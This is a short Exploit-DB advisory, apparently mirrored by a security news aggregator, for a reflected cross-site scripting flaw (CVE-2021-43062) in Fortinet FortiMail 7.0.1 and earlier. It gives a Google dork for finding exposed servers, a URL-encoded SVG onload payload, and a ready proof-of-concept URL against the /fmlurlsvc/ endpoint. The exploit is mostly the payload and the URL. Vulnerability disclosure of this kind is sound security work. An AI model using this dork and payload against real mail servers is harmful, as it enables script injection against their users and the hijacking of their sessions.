[webapps] Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)
2022-2-18 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏
2022-2-18 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏
# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)
# Google Dork: inurl:/fmlurlsvc/
# Date: 01-Feb-2022
# Exploit Author: Braiant Giraldo Villa
# Contact: @iron_fortress (Twitter)
# Vendor Homepage: https://www.fortinet.com/products/email-security
# Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online)
# Version:
# FortiMail version 7.0.1 and below
# FortiMail version 6.4.5 and below
# FortiMail version 6.2.7 and below
# CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)
1. Description:
An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E
3. Proof of Concept:
https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E
4. References
https://www.fortiguard.com/psirt/FG-IR-21-185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062
文章来源: https://www.exploit-db.com/exploits/50759
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh